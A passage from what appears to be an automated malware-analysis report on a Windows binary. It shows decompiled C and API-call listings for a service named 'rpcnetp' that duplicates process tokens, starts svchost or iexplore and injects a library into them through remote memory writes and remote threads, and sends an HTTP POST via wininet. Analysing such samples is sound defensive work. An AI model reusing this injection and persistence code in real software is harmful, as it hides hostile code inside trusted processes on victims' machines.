							if(_t35 == 0) {
								goto L6;
							} else {
								_t35 = _t54[9](_t35, "POST", 0x1d1369, 0, 0, 0, 0x84400100, 0);
								_t54[2] = _t35;
								if(_t35 == 0) {
									goto L6;
								}
								_t54[5](_t35, 2,  &_v8, 4);
								_t54[5](_t54[2], 5,  &_v8, 4);
								wsprintfA( &_v40, "%s: 0\r\n", "TagId");
								_t43 = _t54[7](_t54[2],  &_v40, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t34 = ( ~_t43 & 0x00000002) - 1;
								L14:
								return _t34;
							}
						}
						L6:
						_t34 = _t35 | 0xffffffff;
						goto L14;
					}
					FreeLibrary(_t54[0xd]);
					_t54[0xd] = 0;
					_t34 = 0;
					goto L14;
				}
				return _t30 | 0xffffffff;
			}













0x001d2cd4
0x001d2cdb
0x001d2ce1
0x001d2ce8
0x001d2ceb
0x001d2cf9
0x001d2cfc
0x001d2cfe
0x001d2cfe
0x001d2d07
0x001d2d12
0x001d2d14
0x00000000
0x00000000
0x001d2d16
0x001d2d1a
0x001d2d20
0x00000000
0x00000000
0x001d2d2b
0x001d2d30
0x001d2d32
0x001d2d52
0x001d2d59
0x001d2d5c
0x001d2d5e
0x001d2d54
0x001d2d54
0x001d2d54
0x001d2d73
0x001d2d78
0x001d2d7b
0x00000000
0x001d2d7d
0x001d2d8d
0x001d2d92
0x001d2d95
0x00000000
0x00000000
0x001d2da0
0x001d2dae
0x001d2dbf
0x001d2dd3
0x001d2dd8
0x001d2ddd
0x001d2dde
0x00000000
0x001d2dde
0x001d2d7b
0x001d2d34
0x001d2d34
0x00000000
0x001d2d34
0x001d2d3f
0x001d2d45
0x001d2d48
0x00000000
0x001d2d48
0x00000000

APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
  • GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
  • FreeLibrary.KERNEL32(?), ref: 001D2D3F
  • inet_ntoa.WSOCK32(?), ref: 001D2D5E
  • wsprintfA.USER32 ref: 001D2DBF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess
  • String ID:
  • API String ID: 3127335161-0
  • Opcode ID: d2529c531e04d4ae067d5c82a3609593e1c0a8b50e4b57957b408f9e477c39a1
  • Instruction ID: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
  • Opcode Fuzzy Hash: D411598B4588D5B3C8C3B9583C0AB24D4A1EF4A9E5CAD6325B0B9596C44B49390ADF89
  • Instruction Fuzzy Hash: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
C-Code - Quality: 96%
			E001D3094(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				struct _STARTUPINFOA _t116;
				void** _t117;
				void* _t120;

				_t112 = __ecx;
				_push(0x184);
				_push(0x1d1410);
				E001D1637(__ebx, __edi, __esi);
				 *(_t120 - 0x1c) = 0;
				 *((intOrPtr*)(_t120 - 0x38)) = 0;
				 *((intOrPtr*)(_t120 - 0x3c)) = 1;
				 *(_t120 - 4) = 0;
				_t109 = OpenProcess(0x1f0fff, 1, GetCurrentProcessId());
				 *((intOrPtr*)(_t120 - 0x40)) = _t109;
				if(_t109 == 0) {
					goto L28;
				} else {
					_t116 = 0x44;
					E001D384D(_t120 - 0x90, 0, 1);
					 *(_t120 - 0x90) = _t116;
					 *((short*)(_t120 - 0x60)) = 0;
					 *((intOrPtr*)(_t120 - 0x64)) = 0x181;
					 *((intOrPtr*)(_t120 - 0x50)) = _t109;
					while(1) {
						 *(_t120 - 0x24) = 0;
						if( *((intOrPtr*)(_t120 - 0x3c)) == 0 || E001D3734(_t112, _t120 - 0x194, 0x104) == 0) {
							E001D2B08(_t120 - 0x194, 1);
						} else {
							 *(_t120 - 0x24) = 4;
						}
						if( *(_t120 + 8) == 0) {
							goto L12;
						}
						_t117 = _t120 + 8;
						 *(_t120 - 0x48) = _t117;
						 *(_t120 - 0x20) = 0;
						if(DuplicateTokenEx( *(_t120 + 8), 0x2000000, 0, 0, 1, _t120 - 0x20) != 0) {
							 *(_t120 - 0x44) = 0;
							if(SetTokenInformation( *(_t120 - 0x20), 0xc, _t120 - 0x44, 4) != 0) {
								_t117 = _t120 - 0x20;
								 *(_t120 - 0x48) = _t117;
							}
						}
						 *(_t120 - 0x1c) = CreateProcessAsUserA( *_t117, 0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						if( *(_t120 - 0x20) != 0) {
							CloseHandle( *(_t120 - 0x20));
						}
						L13:
						if(( *(_t120 - 0x24) & 0x00000004) == 0) {
							L23:
							__eflags =  *(_t120 - 0x1c);
							if( *(_t120 - 0x1c) == 0) {
								L26:
								SetStdHandle(0xfffffff6, 0);
								E001D2965(0,  *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
								L28:
								_t66 = _t120 - 4;
								 *_t66 =  *(_t120 - 4) | 0xffffffff;
								__eflags =  *_t66;
								E001D32B0(0);
								return E001D173E( *(_t120 - 0x1c));
							}
							L24:
							__eflags =  *0x1d506c; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							 *((intOrPtr*)(_t120 - 0x38)) = CreateThread(0, 0, E001D2965,  *(_t120 - 0x34), 0, _t120 - 0x4c);
							goto L28;
						}
						if( *(_t120 - 0x1c) == 0) {
							L18:
							if( *((intOrPtr*)(_t120 - 0x3c)) == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t120 - 0x3c)) = 0;
							if( *(_t120 - 0x34) != 0) {
								TerminateProcess( *(_t120 - 0x34), 0);
								CloseHandle( *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
							}
							if( *(_t120 - 0x30) != 0) {
								CloseHandle( *(_t120 - 0x30));
								 *(_t120 - 0x30) = 0;
							}
							continue;
						}
						E001D2B08(_t120 - 0x194, 0);
						_t101 = E001D3683(_t112, _t120 - 0x194,  *(_t120 - 0x34), 0);
						 *(_t120 - 0x1c) = _t101;
						if(_t101 != 0) {
							_t103 =  *0x1d50b4; // 0x0
							E001D3020(_t112,  *(_t120 - 0x34),  *((intOrPtr*)(_t103 + 0x34)), 0, 0, _t120 - 0x1c, 0);
						}
						if( *(_t120 - 0x1c) != 0) {
							goto L24;
						} else {
							goto L18;
						}
						L12:
						 *(_t120 - 0x1c) = CreateProcessA(0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						goto L13;
					}
				}
			}










0x001d3094
0x001d3094
0x001d3099
0x001d309e
0x001d30a5
0x001d30a8
0x001d30ae
0x001d30b1
0x001d30c7
0x001d30c9
0x001d30ce
0x00000000
0x001d30d4
0x001d30d6
0x001d30e0
0x001d30e5
0x001d30eb
0x001d30ef
0x001d30f6
0x001d30ff
0x001d30ff
0x001d3105
0x001d312e
0x001d311c
0x001d311c
0x001d311c
0x001d3136
0x00000000
0x00000000
0x001d3138
0x001d313b
0x001d313e
0x001d3159
0x001d315b
0x001d3171
0x001d3173
0x001d3176
0x001d3176
0x001d3171
0x001d319d
0x001d31a3
0x001d31a8
0x001d31a8
0x001d31d1
0x001d31d5
0x001d3251
0x001d3251
0x001d3254
0x001d3278
0x001d327b
0x001d3284
0x001d3289
0x001d3294
0x001d3294
0x001d3294
0x001d3294
0x001d3298
0x001d32a5
0x001d32a5
0x001d3256
0x001d3256
0x001d325c
0x00000000
0x00000000
0x001d3273
0x00000000
0x001d3273
0x001d31da
0x001d321c
0x001d321f
0x00000000
0x00000000
0x001d3221
0x001d3227
0x001d322d
0x001d3236
0x001d3238
0x001d3238
0x001d323e
0x001d3247
0x001d3249
0x001d3249
0x00000000
0x001d323e
0x001d31e4
0x001d31f4
0x001d31f9
0x001d31fe
0x001d3207
0x001d3212
0x001d3212
0x001d321a
0x00000000
0x00000000
0x00000000
0x00000000
0x001d31ac
0x001d31ce
0x00000000
0x001d31ce
0x001d30ff

APIs
  • GetCurrentProcessId.KERNEL32(001D1410,00000184,001D3308,00000000,00000001,00000113,?,?,001D2421), ref: 001D30B4
  • OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,001D2421), ref: 001D30C1
    • Part of subcall function 001D3734: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
    • Part of subcall function 001D3734: lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
    • Part of subcall function 001D3734: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
    • Part of subcall function 001D3734: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
    • Part of subcall function 001D3734: RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9
    • Part of subcall function 001D2B08: GetModuleFileNameA.KERNEL32(?,00000104), ref: 001D2B23
    • Part of subcall function 001D2B08: lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 001D2B59
    • Part of subcall function 001D2B08: lstrlenA.KERNEL32(?), ref: 001D2B5C
    • Part of subcall function 001D2B08: lstrcmpiA.KERNEL32(-00000003,001D11C8), ref: 001D2B6A
    • Part of subcall function 001D2B08: lstrcpyA.KERNEL32(-00000003,001D11C8), ref: 001D2B7C
    • Part of subcall function 001D2B08: CopyFileA.KERNEL32(?,?,00000000), ref: 001D2B89
    • Part of subcall function 001D2B08: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001D2BA0
    • Part of subcall function 001D2B08: SetFilePointer.KERNEL32(00000000,00000092,00000000,00000000), ref: 001D2BDF
    • Part of subcall function 001D2B08: WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 001D2BF1
    • Part of subcall function 001D2B08: CloseHandle.KERNEL32(00000000), ref: 001D2BF8
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 001D3151
  • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 001D3169
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 001D3197
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 001D31C8
    • Part of subcall function 001D3683: VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
    • Part of subcall function 001D3683: lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
    • Part of subcall function 001D3683: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
    • Part of subcall function 001D3683: VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3
  • CloseHandle.KERNEL32(00000000), ref: 001D31A8
    • Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
    • Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
    • Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
    • Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087
  • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 001D322D
  • CloseHandle.KERNEL32(?), ref: 001D3236
  • CloseHandle.KERNEL32(?), ref: 001D3247
  • CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 001D326D
  • SetStdHandle.KERNEL32(000000F6,00000000), ref: 001D327B
    • Part of subcall function 001D2965: SetStdHandle.KERNEL32(000000F4,?,00000000,001D3289,?), ref: 001D296D
    • Part of subcall function 001D2965: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2976
    • Part of subcall function 001D2965: CloseHandle.KERNEL32(?), ref: 001D297D
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32C2
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32CC
    • Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32D6
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
  • String ID: !$@
  • API String ID: 677720824-1106925043
  • Opcode ID: 48e15aef3bb8d9777781a255bb2fadf36b491b6b4ce89551302cf184b035be13
  • Instruction ID: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
  • Opcode Fuzzy Hash: 1ED0A7C0494E42C1C125A5022CE13A7E244EF0129ECED037079802B6EFBF42313DEF0A
  • Instruction Fuzzy Hash: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
C-Code - Quality: 88%
			E00403683(void* __ecx, void* _a4, void* _a8, char _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						_t7 =  &_a12; // 0x402421
						E00403020(_t20, _t18, __imp__LoadLibraryA, _t22,  *_t7,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x00403683
0x00403686
0x00403687
0x0040368c
0x004036a3
0x004036a7
0x004036c3
0x004036cb
0x004036d6
0x004036d6
0x004036e3
0x004036e3
0x004036f0

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,004031F9,?,?,00000000,?,00000000), ref: 0040369D
  • lstrlenA.KERNEL32(?,00000000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036AE
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036BB
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036E3
    • Part of subcall function 00403020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
    • Part of subcall function 00403020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
    • Part of subcall function 00403020: GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
    • Part of subcall function 00403020: CloseHandle.KERNEL32(?), ref: 00403087
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
  • String ID:
  • API String ID: 677720824-0
  • Opcode ID: db6d812f9c7be18267a37d50a3ba51ee4b957c21e9a373aaaee3175b4369baed
  • Instruction ID: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
  • Opcode Fuzzy Hash: 70D0A780494E46F4C407B5424C2D326D344EF001D9CDE437074000A6F6BE4A322DEF4A
  • Instruction Fuzzy Hash: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
C-Code - Quality: 87%
			E001D3683(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E001D3020(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x001d3683
0x001d3686
0x001d3687
0x001d368c
0x001d36a3
0x001d36a7
0x001d36c3
0x001d36d6
0x001d36d6
0x001d36e3
0x001d36e3
0x001d36f0

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
  • lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3
    • Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
    • Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
    • Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
    • Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent
  • String ID: d
  • API String ID: 2989656138-2564639436
  • Opcode ID: 84e743ce579fb83e573cc9db47027a5d92d4bae25c0e57b22563aa8666223114
  • Instruction ID: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
  • Opcode Fuzzy Hash: E9F046477B4A8431CD8BB564500D3E2E187676A2C2DED9667F9087228CDB8C77460E87
  • Instruction Fuzzy Hash: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
C-Code - Quality: 100%
			E001D23B1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				int _t14;
				int _t17;
				void* _t20;
				int _t21;
				void* _t22;
				void* _t25;
				int _t28;
				_Unknown_base(*)()* _t32;
				void* _t34;
				struct HWND__* _t35;

				_t35 = _a4;
				_t14 = _a8;
				_t32 = 0;
				if(_t14 == 0) {
					L17:
					KillTimer(_t35, 0x64);
					do {
						_t17 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t17;
					} while (_t17 != 0);
					PostQuitMessage(_t32);
					__eflags = _a8 - 0x11;
					if(_a8 == 0x11) {
						L4:
						return DefWindowProcA(_t35, _a8, _a12, _a16);
					}
					L20:
					return 0;
				}
				_t20 = _t14 - 0xf;
				if(_t20 == 0) {
					 *0x1d5078 = 1;
					 *0x1d5049 = _t32;
					 *0x1d50bc = _t32;
					L12:
					_t21 = E001D1466(_t34, _a16);
					__eflags = _t21;
					if(_t21 != 0) {
						goto L20;
					}
					_t22 =  *0x1d50c8; // 0x0
					__eflags = _t22 - _t32;
					if(_t22 != _t32) {
						 *0x1d5078 = 1;
						SetEvent(_t22);
					}
					__eflags =  *0x1d5078 - _t32; // 0x0
					if(__eflags != 0) {
						goto L17;
					} else {
						SetTimer(_a4, 0x64, 0x6ddd00, _t32);
						goto L20;
					}
				}
				_t25 = _t20 - 0x102;
				if(_t25 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L4;
					}
					KillTimer(_t35, 0x64);
					do {
						_t28 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t28;
					} while (_t28 != 0);
					E001D32E0(_t32, _t34, _t35);
					__eflags =  *0x1d506c; // 0x0
					if(__eflags == 0) {
						SetTimer(_t35, 0x64, 0x6ddd00, 0);
					}
					goto L4;
				}
				if(_t25 == 0x2ed) {
					goto L12;
				}
				goto L4;
			}
















0x001d23bd
0x001d23c1
0x001d23c4
0x001d23c5
0x001d248d
0x001d2490
0x001d249b
0x001d24a4
0x001d24aa
0x001d24aa
0x001d24af
0x001d24b5
0x001d24b9
0x001d23de
0x00000000
0x001d23e8
0x001d24bf
0x00000000
0x001d24bf
0x001d23cb
0x001d23ce
0x001d243c
0x001d2443
0x001d2449
0x001d244f
0x001d2452
0x001d2457
0x001d2459
0x00000000
0x00000000
0x001d245b
0x001d2460
0x001d2462
0x001d2465
0x001d246c
0x001d246c
0x001d2472
0x001d2478
0x00000000
0x001d247a
0x001d2485
0x00000000
0x001d2485
0x001d2478
0x001d23d0
0x001d23d5
0x001d23f5
0x001d23f9
0x00000000
0x00000000
0x001d23fe
0x001d2409
0x001d2412
0x001d2418
0x001d2418
0x001d241c
0x001d2423
0x001d2429
0x001d2434
0x001d2434
0x00000000
0x001d2429
0x001d23dc
0x00000000
0x00000000
0x00000000

APIs
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 001D23E8
  • KillTimer.USER32(?,00000064), ref: 001D23FE
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D2412
  • SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2434
    • Part of subcall function 001D1466: PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
    • Part of subcall function 001D1466: WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
    • Part of subcall function 001D1466: CloseHandle.KERNEL32 ref: 001D149C
    • Part of subcall function 001D1466: CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592
  • SetEvent.KERNEL32(00000000), ref: 001D246C
  • SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2485
  • KillTimer.USER32(?,00000064), ref: 001D2490
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D24A4
  • PostQuitMessage.USER32(00000000), ref: 001D24AF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler
  • String ID: rpcnetp
  • API String ID: 1312310708-3180878357
  • Opcode ID: 6fa48f6244e0a94e0ec1405d0d9bbe99e9497798e0a464c9f7457b8b0bb501eb
  • Instruction ID: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
  • Opcode Fuzzy Hash: 56F0271719401EB3C803F8B38C6C73B17026B599C9EED734531627408CAA0D3244DF4B
  • Instruction Fuzzy Hash: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
C-Code - Quality: 75%
			E001D34E1() {
				long _v32;
				int _t3;
				struct HWND__* _t10;
				intOrPtr _t17;
				void* _t21;

				 *0x1d504c = CreateEventA(0, 1, 0, 0);
				 *0x1d5050 = 0x10;
				 *0x1d505c = 0x42a;
				 *0x1d5060 = 1;
				_t3 = RegisterServiceCtrlHandlerA("rpcnetp", E001D2FDE);
				 *0x1d50b8 = _t3;
				if(_t3 != 0) {
					_push(0);
					_push(0x1388);
					_t17 = 2;
					_push(_t17);
					 *0x1d5058 = 1;
					E001D2619();
					 *0x1d5058 = 5;
					E001D2619(4, 0, 0);
					E001D35DB();
					 *0x1d505c = 0;
					 *0x1d5060 = 0;
					_t21 = CreateThread(0, 0, E001D2C05, 0, 0,  &_v32);
					if(_t21 != 0) {
						WaitForSingleObject( *0x1d504c, 0xffffffff);
						_t10 =  *0x1d50c0; // 0x0
						if(_t10 != 0) {
							PostMessageA(_t10, 0x11, 0, 0);
						}
						WaitForSingleObject(_t21, 0x7530);
						CloseHandle(_t21);
					} else {
						 *0x1d5060 = _t17;
					}
					CloseHandle( *0x1d504c);
					return E001D2619(1, 0, 0);
				}
				return _t3;
			}








0x001d34fd
0x001d3502
0x001d350c
0x001d3516
0x001d351c
0x001d3524
0x001d3529
0x001d3531
0x001d3532
0x001d3539
0x001d353a
0x001d353b
0x001d3541
0x001d354a
0x001d3554
0x001d3559
0x001d356c
0x001d3572
0x001d357e
0x001d3582
0x001d359a
0x001d359c
0x001d35a3
0x001d35aa
0x001d35aa
0x001d35b6
0x001d35b9
0x001d3584
0x001d3584
0x001d3584
0x001d35c5
0x00000000
0x001d35d4
0x001d35d8

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D34ED
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnetp,001D2FDE), ref: 001D351C
    • Part of subcall function 001D2619: SetServiceStatus.ADVAPI32(001D5050,001D3546,00000002,00001388,00000000), ref: 001D263F
    • Part of subcall function 001D35DB: RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
    • Part of subcall function 001D35DB: RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
    • Part of subcall function 001D35DB: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
    • Part of subcall function 001D35DB: RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639
  • CreateThread.KERNEL32(00000000,00000000,001D2C05,00000000,00000000,?), ref: 001D3578
  • WaitForSingleObject.KERNEL32(000000FF), ref: 001D359A
  • PostMessageA.USER32(00000000,00000011,00000000,00000000), ref: 001D35AA
  • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001D35B6
  • CloseHandle.KERNEL32(00000000), ref: 001D35B9
  • CloseHandle.KERNEL32 ref: 001D35C5
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent
  • String ID: x
  • API String ID: 3363633688-2363233923
  • Opcode ID: fde0bc8fb109669d3739e76c01462afd47aceeb39e8aeb63b7d363bff009e474
  • Instruction ID: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
  • Opcode Fuzzy Hash: 9FF02BD509C909B3D07734881B12F222385FF82DDDD4EDB3538B4642C6BF09A50AA754
  • Instruction Fuzzy Hash: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
C-Code - Quality: 84%
			E001D2165() {
				int _t51;
				void _t52;
				long _t54;
				void* _t56;
				intOrPtr* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t69;
				void* _t70;

				_push(0xdb0);
				_push(0x1d1400);
				E001D1637(_t60, _t64, _t67);
				 *(_t70 - 0x1c) =  *(_t70 - 0x1c) & 0x00000000;
				_t61 = GetStdHandle(0xfffffff4);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_t65 =  *(_t70 + 8);
				if(ReadProcessMemory(_t61, _t65, _t70 - 0x30, 0x10, _t70 - 0x34) == 0) {
					L16:
					 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
					ExitThread( *(_t70 - 0x1c));
				}
				_t66 = _t65 -  *((intOrPtr*)(_t70 - 0x2c));
				if(ReadProcessMemory(_t61, _t65 -  *((intOrPtr*)(_t70 - 0x2c)), _t70 - 0x20, 4, _t70 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t70 - 0x30) == 0x78 ||  *(_t70 - 0x30) == 0x1bc8) {
					__eflags =  *(_t70 - 0x24);
					if( *(_t70 - 0x24) == 0) {
						goto L15;
					}
					_t51 = ReadProcessMemory(_t61,  *(_t70 - 0x28), _t70 - 0xdc0,  *(_t70 - 0x24), _t70 - 0x34);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L16;
					}
					_t52 =  *(_t70 - 0x30);
